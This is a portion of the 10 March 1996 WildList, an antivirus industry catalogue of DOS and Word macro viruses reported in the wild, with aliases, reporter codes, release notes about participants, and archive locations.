Boot-437................[...............] AcCjDcDgFlFsGmJkKsMsOhPbPdRkRtSc
(continued) SgSmWsYr
BootEXE.451.............[BFD, BE-451....] FlFsIwJkMhMsSg
Bosnia:TPE.1_4..........[TPE_Bos........] JkLs
Brasil..................[...............] CjJkSc
+Burglar.................[GranGrave.1150.] DgFsJkMh
Bye.....................[ByeBye.........] DcKsPdTd
Byway.A.................[Dir2.Byway, Hnd] DcDgEvIwJkScSg
Byway.B.................[Dir2.Byway, Hnd] DcDgEv
Cascade.1701.A..........[1701...........] CjCsDgFsGmGpJkKsMhPdRtSgSmWs
Cascade.1704.A..........[1704...........] CsDgEkFsKsRtScSg
Cascade.1704.D..........[Unk............] FsJk
Chance.B................[Lennon.........] DcFsSc
Changsha.A..............[Centry,.Changes] KsMsRrRt
Chaos.1241..............[Faust..........] JkRrSgYr
Chill...................[Chill Touch....] JkRtSc
Chinese_Fish............[Fish Boot......] CjDgFsJkKsRkRrRtYr
Civil_Defence.6672......[CDV 3.3........] DcPbSg
Concept.................[WordMacro......] AcAdCsDgEwIwJdJkKsMhMsPdRfRkRrRv
(continued) ScSgSmTdWsYp
CPW.1527................[Mediera, Mierda] DgEvJkSc
Crazy_Boot..............[...............] DcDgEwFlJkMhScSgSmTd
DA_Boys.................[...............] CjEwJkRtScSgWs
Dark_Avenger.1800.A.....[Eddie..........] CjDgFsGpIwRrSgWs
Datalock.920.A..........[V920...........] DgYr
DelWin.1759.............[Goblin.1759....] DcJkMsPdTd
Den_Zuko.2.A............[Den Zuk........] DgRtSg
Diablo_Boot.............[...............] DcEvMhPdRaSc
Die_Hard................[DH2, Wix.......] DcDgFlFsJkKsMsRkRtScSgTdWsYpYr
Dir_II.A................[Creeping Death.] CsDgEkFlFsGmGpJkKsOhRrScSgWsYpYr
Disk_Killer.1_00........[Ogre...........] DgEkKs
Disk_Washer.............[...............] ScSm
DR&ET.1710..............[Dret...........] JkMs
EXE_Bug.A...............[CMOS Killer....] DgFsGmJkKsOhPdRfRtScTdWsYp
EXE_Bug.C...............[...............] RtYp
EXE_Bug.Hooker..........[...............] RtYp
Fairz...................[Khobar.........] JkMhMsRf
Fat_Avenger.............[...............] DcRrSm
Feint...................[Int7F-E9.......] DgFsPd
Fichv.2_1...............[905, CHV 2.1...] DgFsGmJk
Filler.A................[DiskFiller.....] CjKs
Finnish.357.............[...............] FsKs
Finnish_Sprayer.........[Aija...........] FsKsMhSc
Flame...................[Stamford.......] JkRrScYr
Flip.2153.A.............[Omicron........] DcDgFsGmJkKsSmYr
Flip.2343...............[Omicron 2......] DgFsJd
Form.A..................[Form 18........] AcCjCsDcDgEvEwFlFsGmGpIwJdJkKsLs
(continued) MhPbPdRfRtScSgSmTdWsYpYr
Form.C..................[...............] CsMs
Form.D..................[Form May.......] CsDcEvFsGmMsPdRtScYr
Frankenstein............[Frank, Sblank..] DgJkMs
Freddy_Krueger..........[Freddy 2.......] FsJkScWsYr
Frodo.Frodo.A...........[4096,.4K.......] DcDgEwFsGpJkKsRrYr
Galicia.................[Telecom........] JkMhRtSc
Ginger.2774.............[Gingerbread....] JkRrSc
GoldBug.................[...............] DgFlJkMh
Green_Caterpillar.1575..[Find,1575,1591.] CjDgFlFsGmGpIwJkLsOhRrRtScSmWs
Helloween.1376.A........[1376...........] DcDgFlIwJkPbRrScWsYr
Hi.460..................[Hi.............] GpJkMsYr
Hidenowt................[...............] DgGmJkPdScSm
HLLC.Even_Beeper.B......[...............] DgMsWs
HLLO.Novademo...........[Nova...........] FsMs
J&M.....................[Jimi, Jimmy....] DcFsIwJkKsMhMsPbPd
Jerusalem.1244..........[1244...........] DgLsSg
Jerusalem.1808.Standard.[1808, 1813.....] CjCsDcDgFsJkKsRkRtSgSmWsYpYr
Jerusalem.Mummy.1364.A..[Mummy 2.1......] DgFsRtYp
Jerusalem.Sunday.A......[Sunday.........] JkRkRtSgYp
Jerusalem.Zero_Time.Aust[Slow...........] DgJdJkRrRtSm
Jos.1000................[Jabb,Jabberwocy] GpMs
Joshi.A.................[...............] CjDcDgFsJkKsRkRrRtScSgSmWsYr
Jumper.A................[French Boot, 2k] CjDcDgEwFsGmGpPdRtScSgYr
Jumper.B................[SillyBop, 2kb..] DgJkKsMhMsSgSm
Junkie..................[...............] AcCsDcEwFlFsGmGpIwJkKsLsMhMsPdRf
(continued) RrRtScSmTdWsYr
Kampana.A...............[AntiTel,Campana] CjDcDgEwFsGmIwJdJkKsMhPbPdRfRtSc
(continued) SgSmTd
Kaos4.687...............[...............] FsJkMsScSgYp
Keypress.1232.A.........[Turku, Twins...] DcDgGpRrRtSgYr
Leandro.................[TimeWarp.......] AeDcEvGpIwJkMhPdRtScWs
Lemming.2160............[...............] RrSc
Liberty.2857.A..........[Mystic, Magic..] DcEvFsRtSmYr
Little_Brother.307......[...............] FsJk
Little_Red.1465.........[Red Book, Mao..] CjDcDgJkRtScSmTdWsYpYr
MacGyver.2803...........[Shoo...........] AdGmJkMsRk
Maltese_Amoeba..........[Amoeba.2367....] DgFsGmKsMsRtSgWsYpYr
Mange_Tout.1099.........[1099...........] DgGmJkKsMsPbSc
Manzon.1449.............[...............] DcEwIwJkMhMsRrTd
Markt.1533..............[Werbe, Media...] DgJk
MIREA.1788..............[Lyceum.1788....] AeEkJk
+MISiS...................[Zharinov,NIKA..] EvYr
Mongolian_Boot..........[Mongol.........] DgScSm
Music_Bug...............[...............] CjFsJkWs
Necros.1164.............[Gnose, Irish3..] DgRf
Neuroquila..............[Havoc, Wedding.] DgJkWs
Nightfall.4518.B........[N8Fall, Nightfa] DgJkPbTd
NJH2LBC.A...............[Korea Boot.....] DgJkYr
No_Frills.Dudley........[Oi Dudley......] DgJkRrRt
No_Frills.No_Frills.843.[...............] JkRrSc
Nomenklatura.A..........[Nomen..........] DgJkMh
November_17th.800.A.....[Jan1, Int83.800] LsSc
November_17th.855.A.....[Int83.855......] DgFsGmJkLsRtSc
NPox.963.A..............[Evil Genius....] FsSc
NYB.....................[B1.............] AdCjDcDgEkEwFsJkKsLsMhMsPdRtScSg
(continued) SmTdWsYpYr
One_Half.3544...........[Dis, Free Love.] AdAeCsDcDgEkEvEwFlFsGmGpJkKsLsMh
(continued) MsPbRfRkRtScSgTdWsYpYr
Ontario.1024............[SBC, 1024......] DcRr
+Parity_Boot.A...........[...............] IwTd
Parity_Boot.B...........[Generic 1......] CjCsDcDgEvEwFlFsGmGpJdJkKsMhPdRf
(continued) RtScSgSmTdYp
Pathogen:SMEG.0_1.......[SMEG...........] DgScWs
Peter...................[Peter II.......] DcJdJkMhSmYp
Ph33R.1332..............[...............] EwJk
Phx.965.................[PUX.965........] MsRa
Ping_Pong.B.............[Bouncing-Ball, ] DgGmGpYr
Predator.2448...........[2448...........] FsJkKsScYr
Print_Screen_Boot.A.....[India, PrnSn...] DgYr
QRry....................[Query, Essex...] DcEvJkSc
+Quandary................[Parity_Boot.Enc] DgTd
Quicksilver.1376........[Quicky, V.1376.] DgFlGmJkPdScTdYr
Quox.A..................[Stealth 2......] DcFlFsJkRtScSgSm
Ripper..................[Jack Ripper....] AcAdCjCsDcDgEwFlFsGmGpIwJkKsMhMs
(continued) PbPdRfRkRtRvScSgSmTdWsYp
Russian_Flag............[Slydell, Ekater] DgJkScYpYr
Sampo...................[Turbo, Wllop...] AcAdCjDcDgEwFsGmIwJkKsMhMsPbPdRt
(continued) ScSgSmWsYp
Sarampo.1371............[...............] DgJdJk
Sat_Bug.Natas.4744......[Satan..........] AdDcDgEvEwFlFsJdJkKsMhMsOhPbPdRk
(continued) RtScSgSmTdYp
Sat_Bug.Sat_Bug.........[Satan Bug......] EvJkScYr
Satria..................[July 4th.......] JkTd
Sayha...................[...............] JkScYr
Screaming_Fist.II.696...[Fist 2, Scream.] CjDgJkRtSg
She_Has.................[Breasts........] DgIwPdTd
Sibylle.................[...............] DcDgFl
Sleep_Walker.1266.......[Swalker........] JkRrSc
Stealth_Boot.B..........[AMSE, NopB.....] CjDcDgEvJkPdRtScSgSmYpYr
Stealth_Boot.C..........[AMSE, NopB2....] CjEvGmJkPdRtScSgYr
Stoned.16.A.............[Brunswick......] DcDgScYr
Stoned.Angelina.A.......[...............] CsDcDgEvFlGmIwJdJkKsMhMsPbPdScSg
(continued) SmTdYp
Stoned.Azusa.A..........[Hong Kong......] CjCsDgFsJkKsRrRtScYpYr
Stoned.Bravo............[...............] JkMsYp
Stoned.Bunny.A..........[...............] ScSgWsYp
Stoned.Daniela..........[...............] ScSg
Stoned.Dinamo...........[...............] DcIwRtScYr
Stoned.Empire.Int_10.B..[...............] JkRtScSg
Stoned.Empire.Monkey.A..[Monkey.........] DcGmJkKsOhPdRrRtScSg
Stoned.Empire.Monkey.B..[Monkey 2.......] CjDcDgEvEwFsGmIwJdJkKsMhOhPdRkRr
(continued) RtRvScSgSmTdWsYp
Stoned.June_4th.A.......[Bloody!........] CjCsDgJkKsRkRrScSmWsYr
Stoned.Kiev.............[Epbr...........] CjEkJkPdRt
Stoned.Lzr..............[Lisa2, Whit....] AdCjDcEvFsJkRtScYr
Stoned.Manitoba.........[Stonehenge.....] DcDgFsJkKsRtSc
Stoned.Michelangelo.A...[...............] AdCjCsDcDgEkFlFsGmGpJkKsOhPbPdRk
(continued) RrRtScSgSmWsYpYr
Stoned.No_INT.A.........[Stoned.........] CjCsDcDgEwFsGmIwJkKsMhOhPbPdRrRt
(continued) ScSgWsYpYr
Stoned.NOP..............[NOP............] DgJkWs
Stoned.Standard.A.......[New Zealand....] CjDcDgEkEvFsGmGpJkKsLsPdRkRrRtSc
(continued) SmWsYp
Stoned.Swedish_Disaster.[...............] CjDgKs
Stoned.W-Boot...........[Stoned.P, Wonka] AdDcEvJkMsRrScWsYr
+SVC.2936.C..............[...............] EvJk
SVC.3103.A..............[SVC 5.0........] DgEkSc
Swiss_Boot..............[Swiss Army.....] DcFlFsJkSm
Tai-Pan.438.............[Whisper........] DcDgFlFsGmJkKsMhMsPbPdRtSgTdWsYr
Tai-Pan.666.............[D2D, Doom2Death] DcDgEkEwJkKsMhMsRtScSgSmWsYp
Tequila.A...............[...............] CsDcDgEwFsGmGpJkPdRfRkRtScSgSmTd
(continued) WsYpYr
Three_Tunes.1784........[Flip, PCBB.1784] AeCjDcEvJkSc
Trakia.653..............[...............] RrSc
Tremor.4000.A...........[...............] CsFlFsJkKsMhMsPbRtSgWsYp
Trojector.1463..........[Athens.........] DcDgFsJkSgSm
Unashamed...............[...............] IwJdJkMhPdScYp
Urkel...................[Nwait..........] CjDcFsJkScSgWs
V-Sign..................[Cansu, Sigalit.] CjDcDgFsGmIwJkKsLsMhPbPdRrRtScSg
(continued) SmWsYr
Vacsina.TP-05.A.........[RCE-1206.......] CjDgFsRtSc
Vacsina.TP-16.A.........[RCE-1339.......] DgFsSm
Vampiro.................[...............] DgRaWs
Vienna.648.Reboot.A.....[DOS-62.........] AeDgEkGpSg
Vinchuca................[...............] DgRaWs
Virogen.Pinworm.........[Pinworm........] CjJk
VLamiX..................[Die Lamer......] DgJkMsRt
WelcomB.................[Bupt.9146......] AdCsDcEvGmIwJkKsMhMsPbPdRtScYp
WXYC....................[...............] CjJkMsOhScSmWs
Xeram.1664..............[N-Xeram.1664...] JkPd
Yankee Doodle.TP-39.....[RCE-2772.......] DgFs
Yankee Doodle.TP-44.A...[RCE-2885.......] DgEkEwFsGmGpJkKsLsMhMsRtSgSmTd
Yankee Doodle.XPEH.4928.[Micropox.......] FlFsJkYr
_814....................[Unsnared, V.814] AeGp
============================================================================
Total for the WildList: 189
============================================================================
Release Notes for the 10 March 1996 list:
There will be a meeting of WildList participants at the NCSA Conference
in Arlington, Virginia, USA, on Sunday, March 31st, at 13:00. Several
WildList participants will be there (some are speaking).
I have corrected Eduardo Velasquez's name, which I had as Eduardo Medina.
Klas Scholdstrom has replaced Mikael Larsson at QA Informatik in Sweden.
Dave Chess has replaced me at IBM since I am now a consultant to IBM and
since he's actually been giving me the IBM reports all along.
Four macro viruses (Nuclear.A, Nuclear.B, Concept.Fr (Word, French Ed.),
and Concept.Imposter) have moved onto the supplemental list.
I am continuously seeking WildList participants for regional reporting,
especially in Central and South America, Spain, former Soviet republics,
and the Far East. Such new participants will need to be in a position
where they can monitor and verify virus incidents. People who develop av
products are best suited. People who represent one or more av products
(agents) and provide localized support may also be qualified if they
actually verify the viruses or forward samples to developers. If you thus
qualify, please send your name, location, organization, product name,
favorite brand of beer, and references (preferably CARO members who know
you). Send the information to wildlist@vcnet.com. Thanks.
============================================================================
The collation of this list is done by Joe Wells, Consultant to IBM's
T.J.Watson Research Center, who is solely responsible for its contents.
The latest WildList is always posted directly by me to the NCSA Security
forum on Compuserve, in the Virus Info/Tools library. The official archive
location for the WildList is ftp.ncsa.com in pub/virus/wildlist.
A complete archive of WildLists is available at the Virus Bulletin web
site (http://www.virusbtn.com/WildLists/index.html).
The WildList is copyright material, but may be freely quoted or cited in
part or in whole. No permission is needed to reprint the list.
All mail in regard to the WildList should be sent to wildlist@vcnet.com.
My former address, wildlist@aol.com, is no longer active.
============================================================================
WildList Vol.603 - (c)1993-1996 Joe Wells - 75511,635 - wildlist@vcnet.com
============================================================================
